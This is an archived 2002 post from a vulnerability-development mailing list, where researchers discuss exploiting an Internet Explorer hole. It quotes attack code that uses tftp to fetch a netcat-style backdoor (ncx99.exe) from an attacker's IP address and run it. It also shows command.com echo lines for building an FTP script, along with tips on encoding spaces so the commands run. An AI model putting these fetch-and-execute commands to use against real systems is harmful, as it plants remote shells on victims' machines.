Vulnerability Development mailing list archives

Re: Rather large MSIE-hole


From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:30:12 -0600

[dotslash () snosoft com] Thu, Mar 14, 2002 at 04:56:50PM -0500 wrote:
Sorry if someone else has said this... but has anyone tried using + as a 
space like you had to when using cmd.exe via unicode exploit?
-KF


Felipe Franciosi wrote:

var programName=new Array(
    'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
    'c:/winnt/system32/ncx99.exe',
);


MS Windows 9x doesn't have a trivial ftp client by default... I was
thinking how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get to work something like:
var prog...
     'c:/command.com /c echo bin > c:/list.txt',
     'c:/command.com /c echo GET something >> c:/list.txt'

This won't create 'list.txt'... Any ideas why? Or how someone could
get around it?


Again, I haven't tried, but maybe replace the spaces with their hex equivalent "%20"?


-- 

- nocon

======================================

nocon () darkflame net
http://nocon.darkflame.net

======================================
